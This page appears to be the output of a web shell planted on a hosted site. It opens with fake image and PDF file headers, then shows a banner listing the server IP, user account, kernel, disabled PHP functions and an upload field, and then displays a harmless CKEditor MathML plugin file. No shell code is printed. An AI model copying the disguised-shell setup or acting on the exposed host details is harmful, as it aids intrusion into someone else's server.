ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 82.197.83.129 / Your IP : 216.73.216.166 [ Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64 User : u489457460 ( 489457460) PHP Version : 7.3.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u489457460/domains/syoft.com/public_html/blogs/fileman1/ |
Upload File : |
//------------------------------------------------------------- // Created by: Ionel Alexandru // Mail: ionel.alexandru@gmail.com // Site: www.fmath.info //--------------------------------------------------------------- (function() { var fmath_instances = 1; var fmath_nbFlash = 0; var fmath_flashMathML = new Array(); var fmath_selectedElement = ""; var fmath_currentElement = ""; var fmath_newDialog = new CKEDITOR.dialogCommand('fmath_formula'); CKEDITOR.plugins.add( 'fmath_formula', { init : function( editor ) { CKEDITOR.dialog.add('fmath_formula', this.path + 'dialogs/fmath_formula.js'); editor.addCommand('fmath_formula', fmath_newDialog); editor.ui.addButton('fmath_formula', { label:'Add MathML Formula', command: 'fmath_formula', icon: this.path + 'fmath_formula.jpg' }); editor.on( 'selectionChange', function( evt ) { /* * Despite our initial hope, document.queryCommandEnabled() does not work * for this in Firefox. So we must detect the state by element paths. */ //var command = editor.getCommand( 'fmath_formula' ) var element = evt.data.path.lastElement.getAscendant( 'img', true ); fmath_currentElement = ""; if(element!=null){ var id = element.getAttribute("id"); if(id!=null && id.indexOf("MathMLEq")>=0){ fmath_currentElement = id; } } } ); //search the last Id }, addMathML : function(m){ fmath_nbFlash =fmath_nbFlash + 1; var newName = "MathMLEq" + fmath_nbFlash; fmath_flashMathML[newName] = m; return newName; }, updateMathML : function(id, m){ fmath_flashMathML[id] = m; }, getSelected : function(){ return fmath_currentElement; }, getCurrentMathML : function(){ return fmath_flashMathML[fmath_currentElement]; }, getMathML : function(name){ return fmath_flashMathML[name]; } }); })();